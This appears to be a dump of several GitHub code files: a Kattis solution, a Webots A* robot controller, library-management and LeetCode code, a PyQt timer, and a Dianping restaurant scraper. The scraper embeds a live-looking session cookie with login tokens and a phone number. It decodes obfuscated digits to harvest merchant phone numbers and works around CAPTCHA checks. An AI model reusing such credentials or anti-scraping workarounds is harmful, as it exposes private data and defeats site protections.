0\n\t\t\tbreak\n\tif flag:\n\t\tprint(\"No\")\n\nelif t == 2:\n\ts = set(arr)\n\tif len(s) < N:\n\t\tprint(\"Contains duplicate\")\n\telse:\n\t\tprint(\"Unique\")\nelif t == 3:\n\tflag = 1\n\td = dict()\n\tfor i in arr:\n\t\tif i not in d:\n\t\t\td[i] = 1\n\t\telse:\n\t\t\td[i] += 1\n\tfor key, value in d.items():\n\t\tif value > N/2:\n\t\t\tprint(key)\n\t\t\tflag = 0\n\t\t\tbreak\n\tif flag:\n\t\tprint(-1)\nelif t == 4:\n\tl = sorted(arr)\n\tif N % 2 == 1:\n\t\tprint(l[N//2])\n\telse:\n\t\tprint(str(l[N//2-1])+\" \"+str(l[N//2]))\nelif t == 5:\n\tl = sorted(arr)\n\tll = list()\n\tfor i in l:\n\t\tif i >= 100 and i <= 999:\n\t\t\tll.append(str(i))\n\tprint(\" \".join(ll))","repo_name":"Weiguo-Jiang/Kattis-Solutions","sub_path":"basicprogramming2.py","file_name":"basicprogramming2.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"24562255878","text":"\"\"\"AstarPlanner controller.\"\"\"\n\nfrom controller import Robot, Supervisor, Node\nimport math\nimport matplotlib.pyplot as plt\nimport numpy \n\n\n# create the Robot instance.\nrobot = Supervisor()\n\n# get the time step of the current world.\ntimestep = int(robot.getBasicTimeStep())\n\nleft_motor = robot.getDevice('left wheel motor')\nright_motor = robot.getDevice('right wheel motor')\nright_motor.setPosition(float('inf'))\nright_motor.setVelocity(0.0)\nleft_motor.setPosition(float('inf'))\nleft_motor.setVelocity(0.0) \nimu = robot.getDevice('inertial unit')\nimu.enable(timestep)\n\npos = robot.getFromDef(\"get_pos\")\ntrans_field = pos.getField(\"translation\")\n\nradius = 0.066\ndistance_between_wheels = 0.16\nvelocity = 2\nx_pos = []\nz_pos = []\n\nclass AstarPlanner:\n \n def get_path(self, grid, init, goal, cost, delta, delta_name, heuristic):\n closed = [[0 for col in range(len(grid[0]))] for row in range(len(grid))]\n expand = [[-1 for col in range(len(grid[0]))] for row in range(len(grid))]\n action = [[-1 for col in range(len(grid[0]))] for row in range(len(grid))]\n plan = []\n closed[init[0]][init[1]] = 1\n x = init[0]\n y = init[1]\n g = 0\n h = heuristic[x][y]\n f = g + h\n \n open = [[f, g, x, y]]\n found = False\n resign = False\n count = 0\n \n while found is False and resign is False:\n if (len(open) == 0):\n resign = True\n print(\"No valid path from Start to Goal !\")\n \n else:\n open.sort()\n open.reverse()\n next = open.pop()\n g = next[1]\n x = next[2]\n y = next[3]\n expand[x][y] = count\n count += 1\n \n if x == goal[0] and y == goal[1]:\n found = True\n print(\"No. of search: \", g)\n \n else:\n for i in range(len(delta)):\n x2 = x + delta[i][0]\n y2 = y + delta[i][1]\n \n if x2 >= 0 and x2 < len(grid) and y2 >=0 and y2 < len(grid[0]):\n if closed[x2][y2] == 0 and grid[x2][y2] == 0:\n g2 = g + cost\n h2 = heuristic[x2][y2]\n f2 = g2 + h2\n open.append([f2, g2, x2, y2])\n closed[x2][y2] = 1\n action[x2][y2] = i\n \n \n path = [[' ' for col in range(len(grid[0]))] for row in range(len(grid))]\n x_ = goal[0]\n y_ = goal[1]\n path[x_][y_] = '*'\n while x_ != init[0] or y_ != init[1]:\n x2_ = x_ - delta[action[x_][y_]][0]\n y2_ = y_ - delta[action[x_][y_]][1] \n path[x2_][y2_] = delta_name[action[x_][y_]]\n plan.append(delta_name[action[x_][y_]])\n x_ = x2_\n y_ = y2_\n \n print(\"expand List\")\n for i in range(len(expand)):\n print(expand[i]) \n \n print(\"----------- PATH ------------\")\n for i in range(len(path)):\n print(path[i])\n \n print(\"----------- PLAN ------------\")\n plan.reverse() \n plan.append('*')\n print(plan)\n \n return path, plan\n \n def getYaw(self):\n imuValues = imu.getRollPitchYaw()\n imuValues = math.degrees(imuValues[2])\n return abs(imuValues) if imuValues < 0 else 360 - imuValues\n \n def diff(self,inp, set):\n tmp = abs(inp - set);\n diff = min(tmp, abs(360- tmp));\n if ((set + diff) != inp and (set - diff) != inp):\n if ((inp + diff) >= 360):\n return -diff;\n else:\n return diff;\n return (inp - set)\n \n def rot90_r(self):\n \n while robot.step(timestep) != -1:\n current = self.getYaw()\n right_motor.setVelocity(2)\n left_motor.setVelocity(-2)\n \n while abs(self.diff(current, self.getYaw())) < 90:\n robot.step(timestep)\n break;\n \n def rot90_l(self):\n while robot.step(timestep) != -1:\n current = self.getYaw()\n right_motor.setVelocity(-2)\n left_motor.setVelocity(2)\n while abs(self.diff(current, self.getYaw())) < 90:\n robot.step(timestep)\n break;\n \n def move(self, last, now):\n store = ''\n if now == '*':\n store = 'stop'\n #print(\"stop\")\n right_motor.setVelocity(0.0)\n left_motor.setVelocity(0.0)\n elif last == now:\n pass\n elif ((last=='^' and now=='>') or (last=='>' and now=='v') or (last=='v' and now=='<') or (last=='<' and now=='^')):\n #print(\"right\")\n self.rot90_l()\n else:\n #print(\"left\")\n self.rot90_r()\n if store != 'stop': \n velo = 0.165\n move_duration = 0.5/velo\n start_time = robot.getTime()\n #print(start_time)\n current_time = robot.getTime()\n right_motor.setVelocity(5.0)\n left_motor.setVelocity(5.0)\n #print(\"straight\")\n while robot.step(timestep) != -1:\n if(current_time - start_time > move_duration):\n values = trans_field.getSFVec3f()\n x_pos.append(values[0])\n z_pos.append(values[2])\n break\n current_time = robot.getTime()\n \n # x_pos.append(values[0])\n # z_pos.append(values[2])\n \n \n right_motor.setVelocity(0.0)\n left_motor.setVelocity(0.0)\n \n def follow_path(self, path, plan):\n \n dummy = 'v'\n for i in range(len(plan)):\n if i==0:\n self.move(dummy, plan[i])\n \n else:\n self.move(plan[i-1], plan[i])\n\n\n\nif __name__ == \"__main__\":\n \n grid = [[0, 1, 1, 0, 0, 1, 0, 0, 0, 0],\n [0, 1, 1, 0, 0, 1, 0, 0, 0, 0],\n [0, 1, 1, 1, 0, 1, 0, 0, 0, 0],\n [0, 1, 1, 0, 0, 1, 0, 0, 1, 0],\n [0, 1, 1, 0, 0, 0, 0, 0, 0, 0],\n [0, 1, 1, 0, 0, 0, 0, 0, 0, 0],\n [0, 1, 1, 0, 0, 0, 1, 0, 0, 0],\n [0, 1, 0, 0, 0, 0, 1, 0, 0, 0],\n [0, 1, 0, 0, 0, 0, 1, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 1, 0, 0, 0]]\n \n\n \n heuristic = [[18, 17, 16, 15, 14, 13, 12, 11, 10, 9],\n [17, 16, 15, 14, 13, 12, 11, 10, 9, 8],\n [16, 15, 14, 13, 12, 11, 10, 9, 8, 7],\n [15, 14, 13, 12, 11, 10, 9, 8, 7, 6],\n [14, 13, 12, 11, 10, 9, 8, 7, 6, 5],\n [13, 12, 11, 10, 9, 8, 7, 6, 5, 4],\n [12, 11, 10, 9, 8, 7, 6, 5, 4, 3],\n [11, 10, 9, 8, 7, 6, 5, 4, 3, 2],\n [10, 9, 8, 7, 6, 5, 4, 3, 2, 1],\n [9, 8, 7, 6, 5, 4, 3, 2, 1, 0]]\n \n init = [0, 0]\n goal = [len(grid)-1, len(grid[0])-1]\n cost = 1\n delta = [[-1, 0], # go up\n [0, -1], # go left\n [1, 0], # go down\n [0, 1]] # go right\n \n delta_name = ['^', '<', 'v', '>']\n Robot1 = AstarPlanner()\n path, plan = Robot1.get_path(grid, init, goal, cost, delta, delta_name, heuristic)\n Robot1.follow_path(path, plan)\n \n t_waypoints = []\n f_waypoints = []\n pos = [-2.25, -2.25]\n t_waypoints.append(pos)\n for i in range(1, len(plan)):\n #t_waypoints.append(pos)\n if plan[i-1] == 'v':\n pos = [pos[0], pos[1]+0.5]\n elif plan[i-1] == '>':\n pos = [pos[0]+0.5, pos[1]]\n elif plan[i-1] == '<':\n pos = [pos[0] - 0.5, pos[1]]\n elif plan[i-1] == '^':\n pos = [pos[0], pos[1]-0.5]\n t_waypoints.append(pos)\n print(\"------ temporary waypoints -----\")\n print(t_waypoints) \n \n pos = [-2.25, -2.25]\n f_waypoints.append(pos)\n for i in range(1, len(plan)):\n if i == len(plan)-1:\n f_waypoints.append(t_waypoints[i])\n break\n elif plan[i] != plan[i-1]:\n f_waypoints.append(t_waypoints[i-1])\n f_waypoints.append(t_waypoints[i+1])\n \n \n print(\"------ final waypoints -----\")\n print(f_waypoints)\n \n z_pos_neg = [ -x for x in z_pos]\n fig = plt.figure()\n fig.suptitle('X - Z position', fontsize=16)\n ax = fig.add_subplot(1, 1, 1)\n ax.spines['left'].set_position('center')\n ax.spines['bottom'].set_position('center')\n\n# Eliminate upper and right axes\n ax.spines['right'].set_color('none')\n ax.spines['top'].set_color('none')\n\n# Show ticks in the left and lower axes only\n ax.xaxis.set_ticks_position('bottom')\n ax.yaxis.set_ticks_position('left')\n \n plt.plot(x_pos, z_pos_neg)\n plt.xlabel(\"X axis\")\n plt.ylabel(\"Z axis\")\n #plt.plot(x_pos, z_pos, 'o', color='red')\n plt.show()\n\n","repo_name":"DhruvPatel30/A-Star-Path-Planning-and-Trajectory-Smoothing","sub_path":"controllers/AstarPlanner/AstarPlanner.py","file_name":"AstarPlanner.py","file_ext":"py","file_size_in_byte":9275,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"34655520545","text":"import re\nimport csv\nimport time\nimport random\nimport requests\nfrom pyquery import PyQuery as pq\nfrom multiprocessing.dummy import Pool\n\nurl_base = 'http://www.dianping.com/shop/'\n\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36',\n 'Cookie': '__mta=245634619.1536160252045.1536160252045.1536160434810.2; _lxsdk_cuid=165a29c7ba4c8-07e63548b75855-9393265-144000-165a29c7ba4c8; _lxsdk=165a29c7ba4c8-07e63548b75855-9393265-144000-165a29c7ba4c8; _hc.v=3f9d95cf-359d-bf59-9ad8-192316f743e0.1536031489; s_ViewType=10; ctu=bb1ea26276669ed59b2b94fee9d8141b73a5ae7e95a2b1558b34fbda8553c6b9; uamo=18629646293; cityInfo=%7B%22cityId%22%3A2%2C%22cityEnName%22%3A%22beijing%22%2C%22cityName%22%3A%22%E5%8C%97%E4%BA%AC%22%7D; selectLevel=%7B%22level1%22%3A%221%22%2C%22level2%22%3A%220%22%7D; ua=18629646293; cy=4; cye=guangzhou; _lx_utm=utm_source%3DBaidu%26utm_medium%3Dorganic; lgtoken=0b13378a2-63a0-43a5-aad9-c831d472bc22; dper=e62e27e62b5dd9a8142bfc051f5352a4425deef47718350c76db17b90bdcea8948263b3dc2457e5ce265fe66c25d64f356973ec4a3bd6cc61edd3abe174703a9afa628bf2bb943483184601be860e667c390eecf33f40bbf12e512cdf4e504e6; ll=7fd06e815b796be3df069dec7836c3df; _lxsdk_s=165b7d1b07e-73b-81f-e55%7C%7C632'\n}\n# 加密数字的数字span标签映射关系\nlist_map = ['', str(1), '', '',\n '',\n '', '', '', '',\n '']\nlist_map2 = ['', str(1), '', '',\n '',\n '', '', '', '',\n '']\n\n\n# 请求url并返回网页源代码函数\ndef get_html(url):\n try:\n session = requests.session()\n response = session.get(url, headers=headers, timeout=8)\n if response.status_code == 200:\n return response.text\n else:\n print('请求网页源代码失败, 错误状态码:', response.status_code)\n except Exception as e:\n print(e)\n print('获取当前url的网页源代码失败!')\n time.sleep(2 + float(random.randint(1, 400)) / 200)\n return None\n\n\ndef get_detail_html(url):\n try:\n session = requests.session()\n response = session.get(url, headers=headers, timeout=8)\n # time.sleep(float(random.randint(1, 1000))/1000)\n if response.status_code == 200:\n return response.text\n else:\n print('请求商家详情页网页源代码失败, 错误状态码:', response.status_code)\n if response.status_code == 403:\n time.sleep(12)\n return None\n except Exception as e:\n print(e)\n print('获取商家详情页的网页源代码失败!')\n time.sleep(2 + float(random.randint(1, 400)) / 200)\n return None\n\n\ndef get_index_html(url):\n try:\n session = requests.session()\n response = session.get(url, headers=headers, timeout=8)\n if response.status_code == 200:\n return response.text\n else:\n print('请求索引页网页源代码失败, 错误状态码:', response.status_code)\n except Exception as e:\n print(e)\n print('获取索引页的网页源代码失败!')\n time.sleep(2 + float(random.randint(1, 400)) / 200)\n return None\n\n\n# 获取当前品类下的页码数\ndef get_page_num(html):\n try:\n doc = pq(html)\n items = doc('.page a').items()\n page_num = []\n for item in items:\n page_num.append(item.text())\n if len(page_num) > 0:\n page = int(page_num[-2])\n return page\n else:\n print('这个品类大概只有一页吧...或者有字母验证码哦!快打开确认下如果有验证码赶紧输给你24秒!')\n time.sleep(24 + float(random.randint(1, 800)) / 200)\n return int(1)\n except Exception as e:\n print('\\n', e)\n time.sleep(2 + float(random.randint(1, 400)) / 200)\n return None\n\n\n# 获取当前城市导航下的所有品类url\ndef get_index_urls(html):\n try:\n doc = pq(html)\n items = doc('#classfy a').items()\n for item in items:\n url = item.attr['href']\n html = get_html(url)\n doc = pq(html)\n sub = doc('#classfy-sub a')\n if not str(sub): # 如果没有小分类就返回大分类url\n yield url\n else: # 如果有小分类就依次返回小分类url\n items_sub = sub.items()\n for item_sub in items_sub:\n uri = item_sub.attr['href']\n if uri == url: # 小分类第一条url和大分类是一样的 去重\n continue\n yield uri\n except Exception as e:\n print(e)\n print('获取当前品类的索引页urls失败!')\n time.sleep(4 + float(random.randint(1, 800)) / 200)\n return None\n\n\n# 获取当前索引页下所有商家详情页的url\ndef get_detail_urls(html):\n try:\n shopids = re.findall('\"shop_img_click\" data-shopid=\"([0-9]+)\"', str(html), re.S)\n for shopid in shopids:\n url = url_base + shopid\n yield url\n except Exception as e:\n print(e)\n print('获取当前索引页的详情页urls失败!')\n time.sleep(4 + float(random.randint(1, 800)) / 200)\n return None\n\n\n# 解析并获取商家详情页内所有所需维度的信息\ndef parse_detail(html):\n try:\n if not html:\n print('糟糕,要解析的这条商家详情页居然是空的!下一条!')\n # time.sleep(4 + float(random.randint(1, 800)) / 200)\n return None\n doc = pq(html)\n data = []\n infos = re.findall(\n 'shopName: \"(.*?)\", address: \"(.*?)\", publicTransit: .*?cityName: \"(.*?)\", cityEnName.*?shopPower:([0-9]+),.*?mainCategoryName:\"(.*?)\", categor',\n html, re.S)\n if infos:\n for info in infos[0]:\n data.append(info)\n else:\n # for i in range(5):\n # data.append('')\n print('未能获取正常的店名地址城市等信息,得是遇见滑动验证码了,快去滑一下快快快快快!')\n time.sleep(12 + float(random.randint(1, 1600)) / 200) # 延迟10-20秒,利用这段时间来滑动详情页验证码\n return None\n tel = str(doc('.expand-info.tel span'))[35:]\n for i in range(10):\n tel = tel.replace(list_map[i], str(i))\n tel = tel.replace(list_map2[i], str(i))# 简单解密联系方式\n tele = \";\".join(tel.split()) # 去除多个联系方式之间的空符号并改为用;连接\n if tele:\n data.append(tele)\n if tele == '无':\n print('哼,这种连电话号码都没有的商家信息要来有啥用,下一条!')\n return None\n else:\n # data.append('')\n print('未能获取正常的联系方式!')\n category = doc('.breadcrumb').text()\n if category:\n data.append(category)\n else:\n # data.append('')\n print('未能获取正常的分类信息!')\n info_str = str(doc('.brief-info span'))\n if info_str:\n for i in range(10):\n info_str = info_str.replace(list_map[i], str(i))\n info_str = info_str.replace(list_map2[i], str(i))\n info = pq(info_str)\n rank = info('.mid-rank-stars').attr.title\n data.append(rank)\n count = info('#reviewCount').text()\n data.append(count)\n avgprice = info('#avgPriceTitle').text()\n data.append(avgprice)\n items = info('#comment_score .item')\n infos = re.findall(\n '口味: (.+?) 环境: (.+?) 服务: (.+?) ',\n str(items), re.S)\n if infos:\n for info in infos[0]:\n data.append(info)\n else:\n # for i in range(6):\n # data.append('')\n print('获取评级均价评论数口味环境服务信息失败!')\n return data\n except Exception as e:\n print('糟糕,遇见Bug了,Bug详情见下面:\\n', e)\n # print('获取该详情页内的数据失败!快点开上面这条url滑动一下验证码!!!(如果有验证码的话)')\n # time.sleep(10 + float(random.randint(1, 2000)) / 200) # 延迟10-20秒,利用这段时间来滑动详情页验证码\n return None\n\n\n# 店名 地址 城市 评分 类别 联系方式 定位 评级 评论数 人均价格 口味 环境 服务\ndef main():\n # 采集城市导航下的所有品类url\n # url = 'http://www.dianping.com/guangzhou/ch10/g4473' # 填入所要爬的城市初始url\n # html = get_html(url)\n # urls = [] # 先获取一个城市导航下的所有品类url填入列表urls\n # for urindex in get_index_urls(html):\n # if urindex not in urls:\n # urls.append(urindex)\n # print('正在采集品类索引url:' + urindex)\n # print('\\n', f'品类索引url采集完成! 一共有{len(urls)}条品类索引url! \\n')\n with open('URLS/北京美食urls.txt', 'r') as f:\n urls = f.readlines()\n with open(r'C:\\Users\\Ph\\Desktop\\AntAgent_Data\\大众点评\\北京美食2.csv', 'w', newline='', encoding='utf-8-sig') as csvfile:\n writer = csv.writer(csvfile)\n writer.writerow(['店名', '地址', '城市', '评分', '类别', '联系方式', '定位', '评级', '评论数', '人均价格', '口味', '环境', '服务'])\n check = []\n for index, urlindex in enumerate(urls):\n urlindex = urlindex.strip()\n print('\\n', f'开始爬取第{index}个品类:{urlindex},一共有{len(urls)}个品类', '\\n')\n html = get_index_html(urlindex)\n page = get_page_num(html)\n if not page: # 如果该品类只有一页,page会返回None,需要手动定义为1页否则会报错\n page = int(1)\n print(f'该品类 {urlindex} 一共有 {page} 页', '\\n')\n i = 1\n while i <= page:\n # time.sleep(3 + float(random.randint(1, 600))/200)\n url_page = urlindex + 'p' + str(i) # 拼接不同页数的索引页url\n print('\\n', f'开始爬取第{i}页:{url_page}', '\\n')\n html = get_index_html(url_page)\n uris = []\n for uri in get_detail_urls(html):\n if uri not in uris:\n uris.append(uri)\n i += 1\n if not uris:\n print('见鬼,很可能是遇上了索引页字母验证码,给你一分钟,快去验证下!!!')\n time.sleep(60 + float(random.randint(1, 1000))/200)\n continue\n for uri in uris:\n print(f'开始爬取详情页:{uri}')\n pool = Pool(4) # 使用多进程提速,数字填入自己电脑cpu核数\n htmls = pool.map(get_detail_html, uris)\n # datas = pool.map(parse_detail, htmls)\n pool.close()\n pool.join()\n for html in htmls:\n data = parse_detail(html)\n if data:\n if data not in check:\n check.append(data) # 检测去重\n writer.writerow(data) # 将爬取到的详情页信息写入csv\n print(f'已写入CSV:{data}')\n else:\n print('该详情页信息已存在')\n # else:\n # print('没有爬取到任何信息呜呜呜, 或者也可能爬到垃圾信息啦!跳过跳过!')\n # time.sleep(4 + float(random.randint(1, 600))/100)\n\n\nif __name__ == '__main__':\n start = time.time()\n main()\n print('Complete!!!!!!!!!!')\n end = time.time()\n spend = end - start\n hour = spend // 3600\n minu = (spend - 3600 * hour) // 60\n sec = spend - 3600 * hour - 60 * minu\n print(f'一共花费了{hour}小时{minu}分钟{sec}秒')\n","repo_name":"ginping/notebook","sub_path":"spider/大众点评/DZDPcrawl.py","file_name":"DZDPcrawl.py","file_ext":"py","file_size_in_byte":12798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"31294941299","text":"import sys\nsys.path.append('..')\n\nfrom _Library.BookClass import Book, BookSet, BookItem\nfrom _Library.LibraryClass import Library, Rack, Shelf\nfrom enums import BookSubject, BookStatus, BookFormat, Address\n\n\nclass Printer:\n def __init__(self):\n pass\n\n def book_printer(self, book):\n assert isinstance(book, Book)\n print(f\"Book name: {book.title}, written by {book.author}.\\n\"\n f\"Please use {book.isbn} to query book locations.\")\n\n def bookset_printer(self, bookset):\n assert isinstance(bookset, BookSet)\n print(f\"Book name: {bookset.book.title}, placed at {bookset.location}, \"\n f\"current available quantity is {bookset.check_availability()}.\")\n\n def library_printer(self, library):\n assert isinstance(library, Library)\n print(f\"{library.name}, located at {library.address},\"\n f\" with {len(library.racks)} {'racks' if len(library.racks)>1 else 'rack'}\")\n\n def rack_printer(self, rack):\n assert isinstance(rack, Rack)\n print(f\"{rack.library.name}, rack id {rack.rack_id},\"\n f\" with {len(rack.shelves)} {'shelves' if len(rack.shelves)>1 else 'shelf'}\")\n\n def shelf_printer(self, shelf):\n assert isinstance(shelf, Shelf)\n print(f\"{shelf.rack.library.name}, rack id {shelf.rack.rack_id},\"\n f\" shelf id {shelf.shelf_id}, placing following books:\")\n for bs in shelf.booksets.values():\n self.bookset_printer(bs)\n\n def shelf_detailed_printer(self, shelf):\n assert isinstance(shelf, Shelf)\n print(f\"{shelf.rack.library.name}, rack id {shelf.rack.rack_id},\"\n f\" shelf id {shelf.shelf_id}, placing following books:\")\n for bs in shelf.booksets.values():\n for bi in bs.bookitems.values():\n self.bookitem_printer(bi)\n\n def bookitem_printer(self, bookitem):\n assert isinstance(bookitem, BookItem)\n if bookitem.status == BookStatus.Available:\n print(f\"Book id of {bookitem.isbn_id}, is {bookitem.status.name}.\")\n elif bookitem.status == BookStatus.Loaned:\n print(f\"Book id of {bookitem.isbn_id} is {bookitem.status.name},\"\n f\" due date is {bookitem.due_date}.\")\n else:\n print(f\"Book id of {bookitem.isbn_id} is {bookitem.status.name}.\")\n\n\nif __name__ == '__main__':\n a1 = Address('503 Beautiful Rd', 'Thiscity', 'WA', '98188', 'USA')\n l1 = Library('Tom Library', a1)\n r1 = l1.add_rack()\n r2 = l1.add_rack()\n s1 = r1.add_shelf()\n s11 = r1.add_shelf()\n s2 = r2.add_shelf()\n\n print(s1,s2)\n\n bk1 = l1.inventory.create_new_book('0-7475-3269-9',\"Harry Potter and The Philosopher's Stone\",\n \"J. K. Rowling\", \"Bloomsbury Publishing\", \"English\",\n BookSubject.Fiction, BookFormat.Hardcopy, 336)\n\n bk2 = l1.inventory.create_new_book('0-7475-5100-6',\"Harry Potter and The Order of the Phoenix\",\n \"J. K. Rowling\", \"Bloomsbury Publishing\", \"English\",\n BookSubject.Fiction, BookFormat.Hardcopy, 389)\n\n bs1 = l1.inventory.create_new_bookset(bk1, s2)\n bs2 = l1.inventory.create_new_bookset(bk2, s2)\n bs1.create_book_item(5)\n bs2.create_book_item(3)\n Printer().library_printer(l1)\n Printer().rack_printer(r1)\n Printer().shelf_detailed_printer(s2)\n bs1.get_book_item_by_id(2).checkout()\n bs2.get_book_item_by_id(3).checkout()\n # Printer().bookitem_printer(bs2.get_book_item_by_id(3))\n print(\"\\nAfter check out books\")\n Printer().shelf_detailed_printer(s2)","repo_name":"sjhhh3/Library-Management-System","sub_path":"_Library/Information.py","file_name":"Information.py","file_ext":"py","file_size_in_byte":3637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"23160136327","text":"\"\"\"\nhttps://leetcode.com/explore/interview/card/top-interview-questions-hard/116/array-and-strings/827/\n\"\"\"\n\nfrom typing import List\n\n# refrenced solution to arrive at this result\nclass Solution:\n def product_except_self(self, nums: List[int]) -> List[int]:\n \"\"\"\n no division\n O(n) desired runtime\n *except nums[i]\n brute force would be O(n^2)\n could do even better with a running prefix multiplier, but then would have\n to divide out nums[i] at each step\n n > 1\n don't necessarily know that input is sorted, so can't use that\n dynamic programming?\n with division would be easy...\n two-finger approach? nope, would be O(n^2)\n ...\n we know all products are 32bits, so that isn't an issue to consider rn...\n binary approach?\n # use L and R arrays - was on the right idea there!!!\n \"\"\"\n N = len(nums)\n L, R = [0] * N, [0] * N\n L[0] = 1\n for i in range(1, N):\n L[i] = L[i - 1] * nums[i - 1]\n\n R[N - 1] = 1\n for j in reversed(range(N - 1)):\n R[j] = R[j + 1] * nums[j + 1]\n\n return [L[i] * R[i] for i in range(N)]\n\n\nclass SolutionOptimized:\n def product_except_self(self, nums: List[int]) -> List[int]:\n N = len(nums)\n ans = [0] * N\n ans[0] = 1\n for i in range(1, N):\n ans[i] = ans[i - 1] * nums[i - 1]\n\n # multiply by things on the right, and update that value R as we go\n R = 1\n for j in reversed(range(N)):\n ans[j] *= R\n R *= nums[j]\n\n return ans\n","repo_name":"kalyons11/kevin","sub_path":"kevin/leet/product_except_self.py","file_name":"product_except_self.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"8013537367","text":"import numpy as np\nimport random\nimport copy\n\nclass Utils:\n def __init__(self):\n pass\n \n def decimalToBinaryRec(num,ret,idx):\n if num > 1:\n Utils.decimalToBinaryRec(num // 2, ret, idx-1)\n ret[idx] = num % 2\n \n def decimalToBinary(num):\n ret = [0,0,0,0,0,0,0,0]\n Utils.decimalToBinaryRec(num,ret,len(ret)-1)\n return ret\n\n def binaryToDecimal(num):\n aux = copy.deepcopy(num)\n aux.reverse()\n res = 0\n for idx, n in enumerate(aux):\n res += n * (2**idx)\n return res\n \n #[0,1,2,3,4,5,6,7]\n #pm = 0.20 * (i*0.10)\n \n def bitMutation(bit, pm):\n if pm > random.random():\n if bit == 0:\n bit = 1\n else:\n bit = 0\n return bit\n ","repo_name":"navfran98/TP1-SIA","sub_path":"LadoB/Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"36250271001","text":"from PyQt5 import QtWidgets\nfrom PyQt5.QtWidgets import *\nfrom PyQt5 import QtCore, QtGui\n\n\nclass UiDialog(object):\n def setupUi(self, Dialog):\n Dialog.setObjectName(\"Dialog\")\n Dialog.resize(532, 321)\n Dialog.setAcceptDrops(False)\n Dialog.setSizeGripEnabled(False)\n self.label = QtWidgets.QLabel(Dialog)\n self.label.setGeometry(QtCore.QRect(40, 50, 141, 31))\n font = QtGui.QFont()\n font.setPointSize(11)\n self.label.setFont(font)\n self.label.setAutoFillBackground(False)\n self.label.setFrameShape(QtWidgets.QFrame.NoFrame)\n self.label.setTextFormat(QtCore.Qt.AutoText)\n self.label.setScaledContents(False)\n self.label.setOpenExternalLinks(False)\n self.label.setObjectName(\"label\")\n self.label_2 = QtWidgets.QLabel(Dialog)\n self.label_2.setGeometry(QtCore.QRect(280, 50, 141, 31))\n font = QtGui.QFont()\n font.setPointSize(11)\n self.label_2.setFont(font)\n self.label_2.setFrameShape(QtWidgets.QFrame.NoFrame)\n self.label_2.setObjectName(\"label_2\")\n self.widget = QtWidgets.QWidget(Dialog)\n self.widget.setGeometry(QtCore.QRect(40, 90, 461, 51))\n self.widget.setObjectName(\"widget\")\n self.horizontalLayout = QtWidgets.QHBoxLayout(self.widget)\n self.horizontalLayout.setContentsMargins(0, 0, 0, 0)\n self.horizontalLayout.setObjectName(\"horizontalLayout\")\n self.lcdNumber_twt = QtWidgets.QLCDNumber(self.widget)\n self.lcdNumber_twt.setObjectName(\"lcdNumber_twt\")\n self.horizontalLayout.addWidget(self.lcdNumber_twt)\n self.lcdNumber_trt = QtWidgets.QLCDNumber(self.widget)\n self.lcdNumber_trt.setObjectName(\"lcdNumber_trt\")\n self.horizontalLayout.addWidget(self.lcdNumber_trt)\n self.savedata = QtWidgets.QPushButton(Dialog)\n self.savedata.setGeometry(QtCore.QRect(230, 210, 75, 23))\n self.savedata.setObjectName(\"savedata\")\n self.widget1 = QtWidgets.QWidget(Dialog)\n self.widget1.setGeometry(QtCore.QRect(40, 150, 77, 54))\n self.widget1.setObjectName(\"widget1\")\n self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.widget1)\n self.verticalLayout_2.setContentsMargins(0, 0, 0, 0)\n self.verticalLayout_2.setObjectName(\"verticalLayout_2\")\n self.start_twt = QtWidgets.QPushButton(self.widget1)\n self.start_twt.setObjectName(\"start_twt\")\n self.verticalLayout_2.addWidget(self.start_twt)\n self.stop_twt = QtWidgets.QPushButton(self.widget1)\n self.stop_twt.setObjectName(\"stop_twt\")\n self.verticalLayout_2.addWidget(self.stop_twt)\n self.widget2 = QtWidgets.QWidget(Dialog)\n self.widget2.setGeometry(QtCore.QRect(420, 150, 77, 54))\n self.widget2.setObjectName(\"widget2\")\n self.verticalLayout = QtWidgets.QVBoxLayout(self.widget2)\n self.verticalLayout.setContentsMargins(0, 0, 0, 0)\n self.verticalLayout.setObjectName(\"verticalLayout\")\n self.start_trt = QtWidgets.QPushButton(self.widget2)\n self.start_trt.setObjectName(\"start_trt\")\n self.verticalLayout.addWidget(self.start_trt)\n self.stop_trt = QtWidgets.QPushButton(self.widget2)\n self.stop_trt.setObjectName(\"stop_trt\")\n self.show_graph = QtWidgets.QPushButton(Dialog)\n self.show_graph.setObjectName(\"show_graph\")\n self.show_graph.setGeometry(QtCore.QRect(222, 235, 91, 23))\n self.clear_data = QtWidgets.QPushButton(Dialog)\n self.clear_data.setObjectName(\"clear_data\")\n self.verticalLayout.addWidget(self.stop_trt)\n self.retranslateUi(Dialog)\n QtCore.QMetaObject.connectSlotsByName(Dialog)\n\n def retranslateUi(self, Dialog):\n _translate = QtCore.QCoreApplication.translate\n Dialog.setWindowTitle(_translate(\"Dialog\", \"RTimer\"))\n self.label.setText(_translate(\"Dialog\", \"Total working time\"))\n self.label_2.setText(_translate(\"Dialog\", \"Total rest time\"))\n self.savedata.setText(_translate(\"Dialog\", \"Save data\"))\n self.show_graph.setText(_translate(\"Dialog\", \"Show Plots\"))\n self.start_twt.setText(_translate(\"Dialog\", \"Start\"))\n self.stop_twt.setText(_translate(\"Dialog\", \"Stop\"))\n self.start_trt.setText(_translate(\"Dialog\", \"Start\"))\n self.stop_trt.setText(_translate(\"Dialog\", \"Stop\"))\n self.clear_data.setText(_translate(\"Dialog\", \"Clear data\"))\n\n\nif __name__ == \"__main__\":\n app = QApplication([])\n apl = QtWidgets.QMainWindow()\n ui = UiDialog()\n ui.setupUi(apl)\n apl.show()\n 